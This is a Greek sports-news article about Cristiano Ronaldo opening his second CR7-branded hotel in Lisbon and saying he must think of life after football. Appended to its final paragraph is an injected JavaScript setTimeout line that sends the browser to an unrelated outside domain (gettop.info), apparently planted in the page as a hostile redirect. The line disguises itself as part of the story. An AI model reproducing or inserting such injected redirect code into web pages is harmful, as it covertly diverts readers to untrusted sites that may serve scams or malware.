Ρονάλντo: Είναι ανάγκη να σκεφτώ και το μέλλον μου…

0
3

 

Ο Κριστιάνο Ρονάλντο, με αφορμή τα εγκαίνια του δεύτερου ξενοδοχείου του, εξηγώντας τη νέα του επένδυση, τόνισε ότι «το ποδόσφαιρο είναι το πάθος του» αλλά ξεκαθάρισε, πως θα πρέπει να σκεφτεί και το μέλλον.

«Η ζωή δεν είναι μόνο ποδόσφαιρο. Προφανώς είναι το πάθος μου, αλλά είναι ανάγκη να σκεφτώ το μέλλον μου,» δήλωσε ο επιθετικός της Ρεάλ Μαδρίτης. Το νέο ξενοδοχείο Pestana CR7 της Λισαβόνας, μια εγκατάσταση που βρίσκεται στο ιστορικό κέντρο της πρωτεύουσας. «Ηταν πάντα ένα όνειρο για εμένα. Η ιστορία μου ως παίκτης πέρασε από εδώ, στη Λισαβόνα έζησα επτά χρόνια».

Το ξενοδοχείο, είναι τεσσάρων αστέρων και 82 δωματίων, διαθέτει μία σουίτα, που ονομάζεται CR7 και είναι εξοπλισμένο με την τελευταία λέξη της τεχνολογίας. Πρόκειται για μια επένδυση ύψους 15 εκατομμυρίων ευρώ.

Το πρώτο ξενοδοχείο CR7 άνοιξε στην γενέθλια πόλη του, τη Μαδέιδα και σύντομα αναμένεται να ανοίξουν ακόμα δύο, το ένα στη Μαδρίτη και το άλλο στη Νέα Υόρκη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here